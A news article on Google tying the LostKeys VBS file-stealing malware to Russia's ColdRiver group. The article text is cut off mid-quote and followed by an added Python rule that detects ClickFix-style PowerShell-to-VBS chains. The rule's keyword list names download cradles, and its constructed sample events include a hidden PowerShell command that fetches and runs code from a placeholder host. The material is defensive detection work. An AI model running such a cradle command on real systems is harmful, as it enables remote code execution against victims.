Google links new LostKeys data theft malware to Russian cyberspies

Published on: 2025-07-19 20:39:15

Since the start of the year, the Russian state-backed ColdRiver hacking group has been using new LostKeys malware to steal files in espionage attacks targeting Western governments, journalists, think tanks, and non-governmental organizations.

In December, the United Kingdom and Five Eyes allies linked ColdRiver to Russia's Federal Security Service (FSB), the country's counterintelligence and internal security service.

Google Threat Intelligence Group (GTIG) first observed LostKeys being "deployed in highly selective cases" in January as part of ClickFix social engineering attacks, where the threat actors trick targets into running malicious PowerShell scripts. Running these scripts downloads and executes additional PowerShell payloads on the victims' devices, ending with a Visual Basic Script (VBS) data theft malware tracked by Google as LostKeys.

"LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and r ...
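The infection chain described above (a user-launched PowerShell command that fetches more PowerShell, which finally starts a VBS payload under a script host) is a parent/child pattern that process-creation telemetry can catch without any sample-specific indicators. The following detection logic is an added example written for this page; it is not Google's code, not ColdRiver tooling, and uses no indicators from the article. It assumes Sysmon Event ID 1 style records with `Image`, `ParentImage`, `CommandLine`, `ProcessGuid` and `ParentProcessGuid` fields, assumes that a ClickFix victim's pasted command runs with `explorer.exe` as the parent (Run dialog or Explorer address bar), and treats a handful of common download-cradle keywords as the trigger; the sample events are constructed.

```python
"""Detect a ClickFix-style chain: PowerShell launched interactively with a
download cradle, followed (possibly several PowerShell generations later) by
wscript.exe/cscript.exe running a .vbs file.  Added example, not from the
original article; field names follow Sysmon Event ID 1 (assumption)."""
import ntpath
import re

# Heuristic download-and-execute indicators in a PowerShell command line.
# Assumption: typical ClickFix cradle keywords, not indicators from the article.
CRADLE_RE = re.compile(
    r"(?i)(\biex\b|invoke-expression|\biwr\b|invoke-webrequest|"
    r"downloadstring|downloadfile|frombase64string|net\.webclient|"
    r"\s-e(nc|ncodedcommand)\s)"
)

POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumption: a command pasted into the Run dialog / Explorer address bar
# is spawned by explorer.exe, so that parent marks an interactive launch.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Constructed sample telemetry (not real events). p2->p3->p4 is the chain,
# p5/p6/p7 are benign look-alikes that must not fire.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ProcessGuid": "p1", "ParentProcessGuid": "p0", "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"ProcessGuid": "p2", "ParentProcessGuid": "p1", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'http://example.invalid/a')\""},
    {"ProcessGuid": "p3", "ParentProcessGuid": "p2", "Image": PS, "ParentImage": PS,
     "CommandLine": r"powershell -ep bypass -f C:\Users\u\AppData\Local\Temp\s.ps1"},
    {"ProcessGuid": "p4", "ParentProcessGuid": "p3", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": PS, "CommandLine": r"wscript.exe C:\Users\u\AppData\Local\Temp\x.vbs"},
    {"ProcessGuid": "p5", "ParentProcessGuid": "p9", "Image": PS,
     "ParentImage": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "CommandLine": "powershell Get-Process"},
    {"ProcessGuid": "p6", "ParentProcessGuid": "p0", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"wscript.exe \\fs\netlogon\map.vbs"},
    {"ProcessGuid": "p7", "ParentProcessGuid": "p1", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoExit -Command Get-ChildItem"},
]


def basename(path):
    """Case-folded file name of a Windows path; works on any host OS."""
    return ntpath.basename(path).lower()


def is_clickfix_launch(ev):
    """PowerShell started from an interactive parent with a download cradle."""
    return (basename(ev["Image"]) in POWERSHELL
            and basename(ev["ParentImage"]) in INTERACTIVE_PARENTS
            and CRADLE_RE.search(ev["CommandLine"]) is not None)


def is_vbs_host(ev):
    """wscript/cscript executing a .vbs file (the final stage in the chain)."""
    return (basename(ev["Image"]) in SCRIPT_HOSTS
            and ".vbs" in ev["CommandLine"].lower())


def find_chains(events):
    """Walk each VBS host's ancestry; report it if a ClickFix launch is above it.

    Returns a list of dicts with the launch GUID, the host GUID and the
    full chain of GUIDs from launch to host."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    hits = []
    for ev in events:
        if not is_vbs_host(ev):
            continue
        chain, seen, cur = [ev["ProcessGuid"]], {ev["ProcessGuid"]}, ev
        # Stop at the telemetry boundary or on a cycle in the parent links.
        while cur["ParentProcessGuid"] in by_guid and cur["ParentProcessGuid"] not in seen:
            cur = by_guid[cur["ParentProcessGuid"]]
            chain.append(cur["ProcessGuid"])
            seen.add(cur["ProcessGuid"])
            if is_clickfix_launch(cur):
                hits.append({"clickfix_launch": cur["ProcessGuid"],
                             "vbs_host": ev["ProcessGuid"],
                             "chain": list(reversed(chain))})
                break
    return hits


if __name__ == "__main__":
    for hit in find_chains(SAMPLE_EVENTS):
        print("ClickFix -> VBS chain:", " -> ".join(hit["chain"]))
```

Walking ancestry rather than matching a single parent/child pair is what lets the rule survive the intermediate PowerShell stages the article describes; the two benign look-alikes (an admin's terminal session and a logon script started by userinit) show why both the interactive parent and the cradle keyword are required before a PowerShell launch counts.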